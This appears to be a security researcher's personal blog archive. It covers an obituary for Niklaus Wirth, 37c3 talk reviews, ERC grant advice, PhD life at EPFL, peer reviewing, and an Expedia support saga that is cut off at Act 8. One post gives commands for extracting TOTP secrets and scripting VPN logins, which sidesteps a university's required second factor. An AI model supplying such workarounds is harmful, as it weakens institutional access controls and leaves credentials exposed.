Random ramblings of a security nerd

RIP Niklaus Wirth

2024-01-05T11:22:00-05:00

Niklaus Wirth, known for his work on programming languages and systems, died on January 1st, 2024 (ETH Zurich). Wirth was known for his work on programming languages and systems with a keen focus on simplicity and functionality for which he was awarded the 1984 Turing Award. His most well-known language is Pascal, a procedural language that rose to fame in the 80ies thanks to Borland's Turbo Pascal compiler. Pascal allowed an easy intro into systems programming. Apart from its simplicity (it can be learned in a few hours), it allows the user to define their own data types, giving them flexibility. Compared to C, the other dominant systems language, Pascal came with guard-rails-by-default. While C is predominately known for its bugs, Pascal is known for its efficiency. Wirth carefully designed his programming languages and made sure that, while they were always effective, there never was fluff. He was a keen advocate of the KISS principle and lived it throughout his career. All his languages (and architectures) are designed around that principle: enabling powerful features while remaining easy to learn and protecting the user from making mistakes.

When I started my computer science studies at ETH Zurich in 2001, he was already retired but ever present in the ETH INF cafeteria and I remember discussing undergraduate studies with him. Apart from BASIC and assembly, Pascal was the first real programming language I learned in early high school and its design principles guided my future career. I loved hacking code and believe that Pascal was instrumental in guiding me into computer science as a field and then systems and security as my research area. During my PhD, we had several discussions regarding systems and efficiency. I clearly remember one discussion we had about the complexities of runtime systems with a particular focus on the libc. While the interactions got less frequent as he "retired" and only sporadically visited ETH, his legacy will remain influential as for security, simplicity is always better than bloat!

37c3: Chaos returning to Hamburg

2023-12-30T21:29:00-05:00

After a three-year hiatus due to the pandemic, the Chaos Communication Congress is finally back at an onsite venue. For those that don't know, the congress is the biggest hacker Conference in Europe. It is known not just for deep technical talks and amazing hacks but also for political talks and a positive and inclusive community. This year, the congress moved back from the Messe in Leipzig to the CCH in Hamburg. After outgrowing the congress center in Berlin (with around 3000 to 4000 attendees) the congress quickly expanded in Hamburg, reaching 12,000 attendees before relocating to Leipzig due to lack of space. After three years of sadness, we're back in Hamburg. The CCH was finally renovated and offers a bit more space, larger lecture halls, and more room for assemblies.

After arrival around noon on December 27, the first impression was somewhat disappointing. Compared to earlier years, there were much fewer installations and much less (for lack of a better word) "spirit". While the congress always was and always will be chaotic, this year there seemed to be much less energy. Luckily over the next couple of days, the spirit picked up and people started building and constructing things. Let's hope that the community rediscovers the energy that made the congress such an amazing experience.

Day 1: Familiarization

The first day usually follows a slow start to get into the congress mood. Assemblies are still built up, people find their place and bearings, and the first talks are being watched. This year, I arrived a little late but quickly got settled so that I could start with a couple of fun talks.

Apple's iPhone 15: Under the C: stacksmashing talks about difficulties with new iPhones where the connection to the system is now over USB-C instead of the proprietary cable. This change made a lot of reverse engineering tools useless. After a short background on the past of iPhone hacking, he goes into detailf how to uncover hidden interfaces when interacting with the new iPhone 15. The talk is recommended for hardware and iPhone hackers and generally, because stacksmashing is an amazing speaker.

Toniebox Reverse Engineering: this talk focused on reverse engineering the Toniebox ecosystem. A Toniebox is an audio player for kids. Using little figurines (with embedded NFC tags) kids can select the story or music they want to play. By tapping left and right the kids can advance to the next song or go back. Similarly, two ears allow the kids to increase and decrease the volume. The hackers completely reverse-engineered the Tonie ecosystem from the "locked" NFC and how to clone it to how they can intercept any interaction of the Toniebox with the backend servers. Interestingly, this allowed them a full compromise of the system including the ability to have an alternate backend server. Apart from fully compromising the Tonie ecosystem (which is an amazing hack), the researchers also discovered that Tonieboxes have extensive logging facilities. Every single button press, Tonie change, and interaction is sent to the Tonie server, resulting in a huge privacy violation. Just for this discussion, it is worth to watch the talk!

Adventures in Reverse Engineering Broadcom NIC: Hugo went on a journey of writing an open driver for Broadcom NICs. In the talk, he focused on some of the difficulties in how the NIC is set up and how the interaction between different parts (and ports) of the NIC works. Apart from lots of details on opaque-box engineering, I found it most interesting that these NICs have chips with several different architectures that interact with each other.

Breaking "DRM" in Polish trains: this talk was one of the highlights of 37c3 for me. A service station for trains discovered that trains from another manufacturer stopped working after being serviced in their shop, only returning to service after the original manufacturer was paid a ransom. The repair shop called on dragonsector, the top Polish CTF team to investigate. The hackers discovered that the manufacturer introduced several kill switches and geo-fencing to prohibit repair from other shops. Luckily, the hackers also discovered some opportunities to get around these kill switches and reinstantiate the functionality of the train. The audacity of the original manufacturer is as mind-boggling as the awesomeness of dragonsector. A must-watch!

Kein(!) Hacker Jeopardy: instead of the beloved hacker jeopardy, Ray tried a different game this year following the 90ies game show "Ruck Zuck". While the people played along, "Hack Zuck" was not nearly as much fun as hacker jeopardy as the audience could not guess themselves. I hope that hacker jeopardy will return next year!

Day 2: Exploration

On the second day, I started exploring the congress center a bit more but also found time for a few talks. The second day is usually the peak as one still has enough energy to push while already having familiarized themselves with the situation. It was good to see several art projects being built up and the congress center slowly turned into a hack center. Apart from watching talks, I also soldered a badge --- the Blinkenrocket --- and played with the badge software a bit.

Why Railway is safe but not secure: Katja gave a nice overview of how "security" is integrated (or not) into rail systems. Railways focus on safety but not security (or privacy) per se. Coming from mechanical and electrical engineering and not computer science, railways focus on physical safety but are somewhat oblivious to computer security. If security standards are defined, they often hardcode ciphers without clearly specifying attack models. Katja therefore called for a rethinking of security for railway systems and more discussion between computer security and railway folks. The talk somewhat reminded me of Stefan Katzenbeisser's talk several years ago which also held up quite well.

Fuzz everything, everywhere, all at once: The LibAFL and AFL++ authors gave a great talk introducing the AFL++/LibAFL framework. Along with discussing hard-to-fuzz targets such as firmware or embedded systems, they also discussed how fuzzers can be customized and improved. Overall a good overview for people not necessarily new to fuzzing but new to LibAFL.

Nintendo hacking 2023: 2008: PoroCYon introduced us to the Nintendo DSi and its peculiarities. After discussing the hardware details and previous hacking attempts, he went deep into the weeds of the different subsystems. Using glitching, PoroCYon managed to dump the firmware and discover interesting attack points which allowed him to finally build a modchip for the DSi. Great low-level talk with lots of embedded systems and ARM details.

Demoscene now and then: amazing talk about the demo scene with lots of demos. Must watch as entertainment and to get into the scene.

ARMore: Pushing love back into binaries: Luca's talk on how to efficiently rewrite ARM binaries statically. After discussing the challenges of rewriting aarch64 binaries, Luca explained how he solved them using a combination of a rebound table, execute-only memory, and careful rewriting. The live version of the talk was a bit broken due to a continuous silent fire alarm that turned off the audio for about 1/3 of the time. Watch for an introduction to ARM assembly and rewriting.

BLUFFS: Bluetooth forward and future secrecy attacks and defenses: Daniele introduced his recent BLUFFS attacks against the Bluetooth standard compromising forward secrecy and future secrecy. Attacks against the Bluetooth standard are universal and work on all implementations (that faithfully implement the standard), they are therefore extremely severe and hard to patch. Oddly, the Bluetooth standard so far did not discuss forward and future secrecy and therefore missed protecting against those types of attacks. Daniele mentioned that he discovered these issues while playing with older attacks, replaying them, and fiddling with bits in the protocol setup. It's somewhat surprising that such heavy attacks exist in the Bluetooth standard despite the large consortium and many researchers analyzing the protocol. Very likely, there are many more such bugs lurking, so this may serve as a call to action for other researchers!

FNORD Jahresrückblick: The FNORD news show is usually a great review of the past year. This year, Fefe and Frank tried to review the past four years to highlight the main themes and issues. The first hour was quite entertaining but then the news got a bit repetitive. Maybe I was too tired or reviewing four years is just too much? In any case, I look forward to the next show next year that only covers one year!

Day 3: Exploitation

Fuzzing the TCP/IP stack: Ilja is known for great talks and deep knowledge of software and systems security, this talk was, therefore a must for me. Especially as Ilja wanted to talk about fuzzing TCP/IP stacks, I was even more excited. Sadly, Ilja did not get too far into details. He gave an overview of simple fuzzing techniques and highlighted the need for stateful fuzzing for network stacks. Unfortunately, he could not finish the implementation of his fuzzer and therefore wasn't able to highlight any cool findings. Overall a topic with lots of potential but I was a bit disappointed by the talk.

Full AACSess: Exposing and exploiting AACSv2 UHD DRM for your viewing pleasure: Adam gave an amazing talk about breaking DRM. Contrary to the title, this talk did not just focus on AACSv2 but Adam started with earlier systems such as CSS, and how they were broken. The team fully broke AACSv2 using a combination of reverse engineering, protocol analysis, and lots and lots of patience. Apart from all the cool technical details, a highlight for me was the primer on SGX remote attestation and how it can be broken through side channels. They even demonstrated how they can extract the core keys for the whole DRM scheme using an attack against Intel SGX. Watch this talk for details on DRM protocols, SGX remote attestation, and lots of breakage. This was my second favorite talk of the congress.

Finding vulnerabilities in Internet-Connected Devices: The two researchers focus on the Poly ecosystem of smartphones (for Zoom and MS Team calls) and demonstrate the insecurity of the IoT ecosystem. By focusing on a simple example, they highlighted some of the cool attack vectors along with their thought process. Good introductory talk into IoT hacking.

Writing secure software: Fefe's talk about how to write secure software using his blog as an example. In short, the key takeaways can be summarized as (i) good threat modeling, (ii) reducing attack surface, (iii) compartmentalization, and (iv) append-only storage. I enjoyed the talk even though some parts felt a bit artificial.

What your phone won't tell you: Lukas talks about how to discover fake base stations. Using a query service and a set of simple rules, phones can detect if fake base stations are nearby and potentially alert users. The rules seemed a bit simplistic but likely will work reasonably well. As it turns out, crowd-sourcing measurements and sharing data of observed base stations can be used nicely to mitigate potential attacks.

Day 4: Departation

After three days full of talks, the fourth day focused mainly on non-technical talks. As I was not interested in them, I enjoyed the opportunity to socialize, connect, discuss, mingle, and hack. While the talks at the congress are always amazing, it's important to focus on the social aspects as well. In my opinion, the congress provides this amazing opportunity to interact with the hacker community and to learn.

The congress is always more than just the talks. It's about meeting friends, forming connections, hacking some code at 4 in the morning after dancing in the club, and watching the occasional talk. I'll see you there next year with new talks, renewed energy, and lots of community spirit! So long, and see you next year at the congress!

Writing (successful) ERC grants in Europe

2022-09-06T15:09:00-04:00

In 2018, when I moved from Purdue University in the US to EPFL in Switzerland, I had the opportunity to apply for an ERC H2020 starting grant in computer science. ERC starting grants are similar to the NSF Career award and can be submitted up to 7 years after completing the PhD, i.e., your clock starts ticking with the date you passed your PhD defense. Given the timing of my move back, I had one single shot and had to make it the best possible shot.

The ERC Starting Grant (StG) is the most prestigious single PI award available in Europe and the competition is fierce. Only about 10% of applications actually win the award, most applicants can only apply a total of 2-3 times. While the Career comes with roughly $500,000 in funding, the StG comes with 1,500,000 Eur which suffices for roughly 3 PhD students plus one post doc over the 5 year lifetime of the award in Switzerland.

The evaluation of the submissions happens in two stages. Applicants submit a 5 page abstract and a 15 page proposal. In the first stage, the abstract along with the applicant's CV is evaluated with roughly 20-25% of candidates progressing to the second stage. The first stage is primarily a selection based on the candidate's background and the rough idea of the project. While having a solid abstract is necessary, sufficient background is a must. Candidates that don't have the right standing regarding prior published papers are unlikely to make it.

In the second stage, both parts (i.e., abstract and main proposal) are sent out for review and the candidate is then invited to present their project in front of a broad committee using a short presentation. The questioning in the committee is fierce as all the different areas are covered at the same time with competition between areas and in the area.

In my opinion, the main reasons why my proposal was successful was that a) I got friendly feedback from peers and b) I dedicated sufficient amount of time into writing.

Writing such a highly competitive proposal is not a weekend rush job but requires careful planning. I started about 5 months before the deadline and spent a good 3 months in writing and getting feedback. Without the feedback, discussions, dry-runs, and interactions of my peers, it would have been impossible to win this award.

To those asking for tips on their proposals, I suggest the following four key tips:

Plan at least 3 months of full time writing and preparation with 5 months overall.
Ask colleagues in your area (and at your school) for proposals. Be specific to look at both successful and unsuccessful proposals.
Brainstorm ideas with colleagues, friends, and successful peers. Work on your 5min pitch and make it solid.
Get iterative feedback from colleagues during your 3 months of writing. Ask for feedback on your drafts and discuss them in detail.

Most universities (or countries) also offer general training and information about the ERC StG. I took part in two such seminars: one for Switzerland and the other local to EPFL. The seminar for all researchers in Switzerland was rather broad but contained a lot of baseline information that was valid across all fields (i.e., from physics over biology to computer science). As practices vary across these fields, the information is rather general but still useful to get a good overview. Similarly talking to other awardees and candidates allows you to get into the mood of writing proposals. The EPFL seminar was very tailored towards technical universities and I got good information from our research office how to customize and specialize. Still, the information was rather broad but gave me a good perspective. What helped me most though was the feedback from my peers and friends in security and my colleagues at the CS department.

I spent the first two months simply asking my colleagues and friends for copies of their proposals, studied the outlines/structures, and asked for what they thought made their proposal successful. This gave me a great overview and idea of what to focus on (and what not). This initial setup phase was incredibly useful to set the scene of my proposal and to understand about the trade-offs between different aspects.

After two months of distillation and some pitching to these peers, I was in the right mindset to start teasing out an outline and draft that I continuously checked with my peers. Every couple of weeks I asked for feedback from someone else. I pre-aligned the timeline to make sure to get timely feedback and to not annoy my friends too much with my requests. This continuous feedback helped me stay focused and allowed me to tailor the proposal to current trends.

Don't underestimate the amount of time it takes to write the proposal. And don't be shy to scrap text and rewrite sections. I dropped whole work packages and rewrote them, or replaced them with (hopefully better) ideas. Text is volatile, adjust, adapt, and massage it to make it better.

Looking back, while I had the necessary background to pass the first stage, I was extremely lucky to pass the interview and second stage. Being at EPFL was certainly a boost for the first stage and I also had PhD students that already graduated from my time at Purdue with excellent publications, so my initial setup was good. My proposal was reasonable and I got a lot of feedback. A couple of years later, I would clarify some aspects and better cater to the diverse committee but overall it was evidently good enough.

Submitting an ERC StG proposal is a huge time commitment. Assess yourself if you've got the necessary resources. If you do, don't be shy to ask for proposals (I got about 5 different proposals from successful colleagues) and ask for rounds of feedback and brainstorming sessions.

If you win an ERC StG: congratulations, well done! If you don't, it's not the end of the world either. With only a 10% acceptance rate, the results are random in a way that many great proposals that deserve to be accepted are rejected due to minor hickups or random factors. Try again if you can, or submit somewhere else. In the end, submitting to proposals as faculty is similar to submitting papers as a student. Sometimes you win, sometimes you have to try again!

If you plan to submit an StG grant, reach out and ask me questions. I'm happy to help!

Second factor on VPNs considered harmful

2022-07-11T23:35:00-04:00

Due to the risk of "cyber threats", many universities are switching to second factor authentication to log into their VPNs. Many companies moved to second factor for VPN authentication quite some time ago to protect their perimeter from external access. The idea is that users have to provide two factors to log into the internal network (not necessarily internal services), reducing the risk of users falling victims to phishing attacks where they leak their password.

Now, in comparison to companies which are usually a more closed environment, universities are much more open and much more diverse. First, they often offer a public WiFi that gives local users (in WiFi proximity) access to a somewhat internal network. Second, there are large classes of users with tens of thousands of students that all bring their own devices that don't run under any corporate policy.

Under such a "bring your own device" scenario, trying to protect internal network access seems futile. Nevertheless, many universities are trying to enforce 2nd factor authentication and thereby burning through many hours of user time to bring their second factor (usually a phone) to log into the VPN.

Let's see how we can make the login process a bit easier. In short, let's clone our second factor device and automatically generate authentication codes on demand as the VPN connection is set up.

TOTP: Time-based One Time Password

TOTP is a simple scheme that creates a one-time password that is valid during a short time frame. TOTP uses HOTP (hash-based one time passwords) with a rolling epoch that serves as the HOTP counter. The concatenation of the secret key and the counter are fed into HMAC-SHA1. By default, an epoch is 30 seconds long and is rooted with the start of Unix time. As an aside, using HOTP has the advantage that using (reading) a password synchronously updates the counter on both the verifier and the user ensuring that the password can only be used once. The downside of HOTP is that the counters must stay in sync.

Cloning TOTPs

You likely have used Google Authenticator (or a similar app) to store your OTP keys. As you will have guessed by now, you can also extract these secrets.

Fire up Google Authenticator and export your keys.
Scan the QR code with another phone (or take a screenshot) and store the data as my_keys.otp
Clone extract_opt_keys and check that the script will not leak your secrets to somewhere else
Run python3 extract_opt_secret_keys.py my_keys.otp
Store your TOTP secret somewhere save (e.g., ~/.totp_university)
Install oathtool from your favorite package manager
Run cat ~/.totp_university | oathtool -b --totp - to get the current OTP value

Using the last step, you cloned your OTP and have replaced your phone with a command. Well done! Now let's automate the VPN login.

You can connect to your VPN with: openconnect -v -b vpn.uni.edu --authgroup "Super Secret Name of Auth Group" --user=asdf@uni.edu. To automatically connect with TOTP you can expand the command as follows: echo -e 'YourSecredPassword\n'$(cat ~/.totp_university | oathtool --totp -b -) | sudo openconnect -v -b vpn.uni.edu --authgroup "Super Secred Name of Auth Group" --user=asdf@uni.edu --passwd-on-stdin. Now store this command in a shell script and be happy that you neither have to remember your password nor bring your second factor.

PhD at EPFL, in Europe

2021-01-21T23:10:00-05:00

Every December a lot of prospective students reach out to faculty regarding PhD programs. This is the time where we review the students and assess their skills and potential along many dimensions such as past research, research ideas, engineering capabilities, and systems experience. These discussions along with the submission of the student (consisting of grades, CV, and research statement) then culminate in one of several reviews of different faculty in preparation for the EDIC admission meeting. At the admission meeting, candidates are discussed and eligible candidates are split into fellowship candidates and admissible candidates.

Notifications go out to students soon after the admission meeting and the tables turn, now it’s the students’ turn to ask questions. Many students have several offers and now have to choose where they want to spend the next 5-6 years of their lives. This decision is not simple and depends on many dimensions such as group dynamics, university ranking, location, work/life balance and your additional personal constraints.

A PhD forms a long term professional relationship

After deciding to do a PhD, the one key decision is in which group/with which adviser you do your PhD. In order to get the most out of your PhD it is critical to be in a comfortable and supportive environment. You will spend the majority of your time over the next couple of years with your colleagues in the group and will interact with your advisor frequently. The PhD relationship will last well beyond your PhD. If you choose to stay in academia, your adviser will continue to write letters on your behalf at least until you complete your tenure track position. Even if you decide to work at a company, your PhD adviser will frequently be available as a mentor and will continue to advise you. Figure out if you’ll be able to work together by asking questions about the work environment, advising style, and group relationships. Interview both the adviser and the group. In my group, I try to talk to potential candidates several times: both before the committee makes the decision but also after they get an offer to allow them to decide if my group is a good fit. After receiving an offer, use this opportunity to connect, network, and to ask questions. Maybe even ask to be part of one of the group meetings.

In addition to questions on research topics in a group and advising style, students often worry about the cost of living, language requirements, or course requirements. Let me try to compare EPFL to US universities. Note that I have spent from 2012 to 2018 in the US system both at UC Berkeley (the expensive bay area) and Purdue University (the cheaper midwest), and can therefore compare the range of options. As a baseline, I’ll compare to Purdue University.

Salary and fixed costs

The yearly salary at EPFL ranges from 52,400 CHF in the first year to 55,400 CHF in the fourth and later years. In addition to your salary, EPFL pays social insurance, unemployment insurance, and retirement funds of around 9000 CHF per year. At Purdue, the yearly salary is around 19,000 US$. At the given incomes, the taxes in both countries are around 10%. Studying at a university often involves some form of additional fees. At EPFL you may pay 200-300 CHF per year to access the university sport facilities, while at Purdue different university fees for PhD students sum up to around 2,000 $USD. Both in Switzerland and in the US, health insurance is mandatory and comes at around 3,600 CHF per year for Switzerland and 600 $USD per year for the US (in the US, the employer pays a large chunk of healthcare costs as benefits). Both in Switzerland and in the US, your largest fixed cost will be housing. A room in a shared apartment (you have a private room with shared kitchen and bathroom) will be between 700 CHF and 1,000 CHF, while a study (your own private apartment with a bedroom and a common area) will be around 800 CHF to 1,200 CHF per month. Of course, you’ll find apartments that are much more expensive too, e.g., if you prefer lake view. In the US, you generally pay 100-300 less per month for your apartment. Fiber internet is around 50 CHF per month and a mobile phone plan is around 20-30 CHF per month. Public transport is around 80 CHF per month.

Yearly budget	EPFL (CHF)	Purdue (US$)
Salary	52,400	19,000
Taxes	10% (5,240)	10% (1,900)
Housing	12,000	9,600
Health insurance	3,600	600
University fees	0-200	2,000
Fiber and mobile	840	840
Public transport	960
Car (insurance, devaluation, gas)		1,000
Free budget (food, leisure, travel)	29,560	3,060

The huge difference in salary between the US and Switzerland results in a key advantage: you do not have to do internships but you can. So instead of having to hunt for an internship each summer (which will delay your PhD as you may have to take purely engineering-focused internships) you can pick and choose what kind of internships you want to do during your PhD. I encourage my students to at least intern once during the PhD but internships are not mandatory. A research-oriented internship during your PhD allows you to compare academic to industry research and to check out potential employers (or helps you decide that you want to stay in academia).

Compared to the US, you are considered an employee and therefore also get 4 weeks of paid holiday throughout the year. Taking these holidays to relax is essential to succeeding at your PhD. I continuously encourage my students to take the necessary time off and to push towards a sustainable work/life balance.

Day to day life

A big difference between the US and Switzerland is eating out. In Switzerland, eating out is a rarer occasion, often with friends while in the US it is much more common to grab a bite somewhere. When eating out, a single course costs between 20 and 30 CHF, drinks not included. In the US, you can often eat below 10 US$. In Switzerland, many students cook dinner themselves and on weekends invite friends over to offset the higher restaurant costs. A meal at one of the many EPFL cafeterias is around 10 CHF.

Compared to the US, public transport is very well built and the vast majority of students do not own a car. You can take trains and buses almost anywhere. Transport prices are high but reasonable. Taxis and Ubers are rarely used. It is also common to bike to work (and around).

Lausanne is in the French speaking part of Switzerland but English is generally very well spoken. Switzerland is a country with four national languages, so linguistic diversity is very commonplace. In fact, Lausanne as the Olympic capital has more than 40% foreigners that bring an urban and highly European flair to the city. With around 200,000 inhabitants, Lausanne is the fourth largest city in Switzerland and is comparable (i.e., as urban as) a city in the US of around 1-2 million inhabitants. There is no need to learn French during your PhD but language courses are a great way to mingle with locals and to appreciate the culture. Language tandems (two students wanting to learn opposite languages) are a great way to meet many different and interesting people. In addition to EPFL’s free language courses, my group will pay for French language courses you want to take, but they are of course not mandatory. The language in the group is English.

The EPFL campus is situated right outside of Lausanne, close to lake Geneva. Atypical for European universities, EPFL follows the design of US-style campuses where different university buildings are not distributed across the city but are close to each other, allowing students between fields to interact liberally. Lausanne is a city with a very high quality of life. As the olympic capital, it offers lots of opportunities for leisure activities. The Lavaux region offers ample hiking opportunities in the vineyards, the mountains are close for more hiking and skiing, and the beach along the lake offers opportunities for BBQ and water sports.

PhD research and EDIC requirements

As a PhD student, you will predominantly focus on your research and be involved in research projects of your peers. The PhD culminates with a thesis that serves as a proof that you can conduct independent academic research. Usually, a thesis consists of 3-4 publications at scientific conferences that drill deep into a specific topic.

In addition to the scientific work (which is the core goal), you will have to fulfill several other requirements. At EDIC, you have to pass a depth course in your first year with a grade of more than 5 (out of 6). There’s a list of available courses and my students generally pick one of the systems courses along with some other courses. In total, students need to achieve 30 ECTS credits (30 ECTS credits is considered a full time semester load for a bachelor or master student who only takes classes) throughout their PhD, generally in the first 2 years. Compared to US programs, the course load at EPFL is extremely light and usually consists of 3 classes (18 ECTS credits) and 2 semester projects (12 ECTS credits; projects are usually part of the PhD research). The EPFL course load for PhD students is much lower than at many US universities where students usually have to take several semesters worth of classes.

At the end of your first year, you must have passed the depth course and completed two semester projects. Afterwards, you must pass the candidacy exam which asks you to select, analyze, and discuss three research papers in your research area in front of a faculty committee. This candidacy exam tests if you’re fit for PhD level research.

In addition to your research duties, you will be a teaching assistant throughout most of your PhD (except for the first, last, and 8th semester of your PhD). Teaching is well integrated into research at EPFL and bachelor and master education allows you to learn interacting with a group of 20-30 bright students and help them with their class work. Classes are often in your area of research, allowing you to recruit students for bachelor and master projects/theses that will then help you on your research projects. At EPFL, bachelor and master students have to conduct research projects as part of their education. These students are often a great source of help for your projects and allow you to practice your advising skills.

EPFL labs are generally very well funded and any hardware that you need for your research, e.g., access to a cluster, compute resources, or special hardware is paid for along with trips to conferences for networking. The funding decisions lie within the powers of the group leaders. My rule of thumb is that first author students attend the conference to present the paper. For all other students we decide based on need and opportunity. I generally equip my PhD students with desktops and laptops based on their computing needs.

Fellowship versus Admissible

The EDIC doctoral school distinguishes between fellowship candidates (their first year is being paid by the school and they can choose up to two labs to do semester projects in) and admissible candidates (they are hired directly by a lab and do the semester projects in these labs). A fellowship is a recognition of often excellent prior research work or excellent grades. In general, labs at EPFL are very well funded and the number of PhD students is usually restricted by the bandwidth of the faculty and not the admissible/fellowship status of the student. The HexHive lab is well financed through EPFL’s base funding as well as generous funding from different funding agencies and several industry partners.

No matter if you received a fellowship or admissible evaluation, you should reach out to the faculty that you are interested in working with and try to talk to them about potential research projects and if they are a good fit for you. If you’re admissible, you should just start a little earlier.

Interactions in the HexHive lab

All research labs are different, we folks in the HexHive lab are extremely collaborative. I’m using several tiers of interactions. We have a group Slack with open channels for all projects and discussions. Students can ask questions at any time or join ongoing discussions. Once a day, we each write a quick summary about the status of our project and if we’re stuck (this serves as a quick daily scrum opportunity for me to check in if needed). At least once a week, we discuss each student’s project in depth for at least 30 minutes. In addition, one student will present her or his project (or crazy idea) in front of the full group for general feedback. Each project has a student lead with 1-2 other students joining in and being responsible for their parts. 80% of your research time you will spend on your project and 20% you will focus on other projects, broadening your scope. In addition, we have frequent social gatherings, a weekly group lunch, and often hang out for coffee or informal interactions. I also encourage students to reach out whenever they have questions.

Positive reviewing in software security

2019-12-07T05:01:00-05:00

Yesterday we concluded the NDSS20 PC meeting. In total, 12% of papers were accepted, 6% now have a short fuse major revision opportunity, in line with other top tier conferences. The PC chairs handled the meeting well, striving for positivity and feedback for the authors. Overall, this was a great experience with lots of interesting discussions and arguments.

Looking at the subset of systems/software security papers, I'm a little worried. In total, I positively bid on 53 papers (during the bidding phase of the review process, reviewers indicate which papers they would like to review). Note that this set does not include papers I have a conflict of interest with. Also note that this selection is highly biased towards what I am interested in. I'm therefore focusing only on the subset of papers I am a) interested in and b) not conflicted with. Your mileage will vary.

Of the papers in my bid, only 6/53 papers received an accept/major revision decision. This results in a sad maximum 11% acceptance rate (assuming the unlikely event that we would accept all revisions). Of the six papers moving forward, I reviewed all of them (in total, I reviewed 17 papers this round). Three of the six I championed, for the others I argued at least for a major revision. If all five major revisions are accepted, this will result in, at best, an 11% acceptance rate in my field. At worst, we will have a 2% acceptance rate. I strongly believe that there are more good papers in this community. Let us find ways how to distill these good papers and bring them to light!

Many of my reviewer peers are complaining about the low acceptance rate in software/systems security. Unfortunately, it is extremely easy to reject papers as a reviewer. Assume you are a reviewer. If, every time you review a set of papers for a conference, only two papers out of 20 are acceptable then you may want to adjust your approach. I'm not talking about the occasional batch of bad papers. If this happens every time you review, you may either want to reconsider your bidding strategy (your area may not be of interest to others) or your review scores (you are too tough on papers). At top tier conferences, the program is made out of papers from many different sub areas. These areas change over time, as new areas become dominant, others lose importance.

My (informal) observation is that systems/software people are too tough on papers their area. As systems people we not only assess the idea and the design of the system but also how well it is implemented and evaluated. We get satisfaction by finding flaws in the design ("ah, you did not consider that the blubb bit remains writable"), by asking for massively more evaluation ("well, they only tested their system on 23597 applications and 253 million lines of code"), or by comparing to marginally related work whose underlying assumptions may no longer be valid ("In 1983 there was a paper on information flow control that solved the problem for programs up to 200 lines of code"). While pointing out such issues is great (and they should be clearly discussed in the paper), they can often be handled as a major revision. I've been guilty of all these fallacies myself. When considering these flaws, assess if they are fixable and remain positive.

Being part of the review task force at Usenix SEC20 (the review task force supports the PC chairs by reading reviews of a large chunk of papers and guiding the online discussions), I saw how people in other communities fight for acceptance of papers in their area. The general vibe was much more positive and reviewers were looking for reasons to accept a paper, not to reject it.

So, software/systems security folks: find reasons to accept the paper. Let's turn our systems skills into an advantage that makes our field stronger. We can shape the program of conferences and accept more papers that are closer to our interest. Stop worrying about the occasional false positive where a bad paper is accepted, but focus on the broader picture of what is interesting in our area. As we carefully review papers, we can guide authors on how to improve their papers. Augment your review with facts that you liked about the paper, letting authors know the strengths of their paper along with the weaknesses. When you make your final judgment, consider the full set of pros and cons. For the weaknesses, consider if they are fixable. Give the authors clear instructions on what you think the weaknesses are and point them at how they can fix them. Then, fight for acceptance instead of rejection. The next deadline is coming up soon!

Expedia: from software bug to customer service nightmare, a modern Odyssey

2019-07-01T22:10:00-04:00

While traveling through Europe, I logged into my Expedia.com account and something odd happened: instead of being logged in, the Expedia system decided to redirect me to Expedia.ch and created a new account. Oddly, it copied all my credit card details, account information, frequent traveller details, and individual travellers to this new (unwanted) account. After this glitch, I ended up with two accounts with the same username and the same password: one for Expedia.com, the other for Expedia.ch. This is likely some form of GDPR violation as the data of multiple Europeans including their passport information was copied to a different company (Expedia.com and Expedia Switzerland are two independent companies that should not have access to each other's data).

Most of the time when I logged in, I ended up in my Expedia.com account that had all my travel details, my previous itineraries, my reservations, and my points. But every now and then, I ended up in the empty Expedia.ch account clone which was annoying. Additionally, I received unwanted emails from the clone Expedia.ch account.

So I set out to delete the obsolete Expedia.ch account which ended in an interesting Odyssey in 30 acts. What started as a software bug turned into a huge customer service fail that resulted in 30+ interactions with customer service, them losing all my data and all my collected points, and offering me 3000 points and 75$ for my issues as compensation in the end.

Instead of keeping an account and my data private, Expedia created a fake account. Instead of deleting the fake account, Expedia deleted both accounts. Instead of them reactivating my wrongfully deleted account I had to create a new account. Instead of adding points to the new account, Expedia deleted the new account again. After 30+ interactions over two months with the massively incompetent support, I lost about 10,000 points, my status, but received $75 and 3000 points (about $100 total) in compensation. Go Expdia!

So, in conclusion, I would strongly recommend against using Expedia. If you have to, try to use points as quickly as possible. Keep emails and proof of interactions. If you can, move to a competitor. Unfortunately, there are not many alternatives apart from Expedia due to a massive amount of consolidation in the travel portal business. The main alternative appears to be booking.com. But first read on about the individual acts and interactions with the crappy support:

Act 1: Expedia.com: May 9

I contacted the gold support team and asked them to delete the unwanted Expedia.ch account. After several days I received a reply with a canned response that accounts cannot be merged. I responded that I'd like to remove the cloned account as it's a bug in their system.

Act 2: Expedia.com: May 20

This time, someone apparently read my email and mentioned that I must contact Expedia.ch. So I contacted Expedia.ch and described the situation, again. I was told to expect an answer in 1-2 days.

Act 3: Expedia.ch: May 23

I received a reply that, due to data privacy laws, accounts cannot be deactivated over email. The email also mentioned that I should call a phone number in Germany. This is when I learned that Expedia.ch accounts are handled by Expedia.de. So I called, and described the situation, again.

Act 4: Expedia.de: May 28

After a short waiting period, I got a competent call center agent who walked me through the deactivation process of the dead account. He mentioned several times that it was odd that he could see bookings from the Expedia.com account but assured me that the German team has no access whatsoever to the Expedia.com account and deleting the Expedia.ch account will not influence or disturb the Expedia.com account. In any case, he assured me that if an account had active bookings this account could not be deleted under any circumstances and that the system would not allow it.

He went ahead and deleted the Expedia.ch account and told me I would get a confirmation mail.

I did never receive a confirmation mail. Instead, both my accounts were deleted.

Let me repeat: both the dead unwanted account and my active account with points and several active reservations were deleted.

Act 5: Expedia.de: May 28

I called again and complained that my account had just unwillingly been deleted. He checked and saw that both accounts have been deactivated and assured me that this should not have been possible.

The agent told me that he would look into the case and fix it. My hopes were up and I thought that the German agents are helpful, able, and would remedy the situation. With my hopes up we ended the call.

Act 6: Expedia.de: May 28

I received a voice mail from the previous agent who explained that they could not do anything from Expedia.de as my account was at Expedia.com and that they cannot access those accounts.

He mentioned that there is a mediation service as part of the European service center that I should contact. He sounded genuinely unhappy about the situation, which, unfortunately, did not help me much.

So, I followed his advice and contacted the mediation service, and explained the whole situation, again.

Act 7: Expedia.com: May 29

I contacted the internal Expedia customer service (through a special email address that I was given) and described the whole situation, again. After not hearing back for a day, I contacted the regular customer support. From the regular customer support, I received an email that I should call as quickly as possible.

So I called, again.

Act 8: Expedia.com: May 29

When calling, I was told that all lines were busy and that the estimated wait time was 20 minutes. I waited for an agent for 40 minutes, continuously being told that my call was important and that my time was important. To be honest, it did not feel as if they felt that my time was important.

